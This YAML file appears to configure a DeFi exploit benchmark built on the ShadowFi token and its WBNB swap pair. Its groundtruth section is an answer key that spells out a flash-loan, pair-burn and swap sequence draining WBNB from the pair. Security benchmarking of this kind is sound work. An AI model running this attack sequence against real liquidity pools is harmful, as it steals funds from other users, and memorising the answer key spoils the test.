# Information for benchmarks building.
project_name: "ShadowFi"

ctrt_name2cls:
  - ["sdf", "ShadowFi"]
  - ["wbnb", "WBNB"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["sdf", "new ShadowFi(1662075000)"]
  - ["wbnb", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]

extra_actions:
  - "function burn_sdf_pair(uint256 amount) internal eurus {
    sdf.burn(address(pair), amount);
    pair.sync();
    }"

extra_deployments:
  - "sdf.afterDeploy(address(router), address(pair));"

extra_statements:
  - "vm.warp(blockTimestamp);"

attack_goal_str: "wbnb"

groundtruth:
  - ["borrow", "wbnb", "owner", "1e16"]
  - ["swap", "pair", "attacker", "wbnb", "sdf", "1e16", "pair.getAmountOut(1e16, address(wbnb))"]
  - ["burn", "sdf", "pair", "sdf.balanceOf(address(pair)) - 1"]
  - ["swap", "pair", "attacker", "sdf", "wbnb", "sdf.balanceOf(attacker)", "pair.getAmountOut(sdf.balanceOf(attacker), address(sdf))"]
  - ["payback", "wbnb", "owner", "1e16 * 1003 / 1000"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "sdf":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
    is_burnable: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["sdf", "wbnb"]
    support_swaps:
      "wbnb": ["sdf", "wbnb"]
      "sdf": ["sdf", "wbnb"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

pattern: "Token Burn"
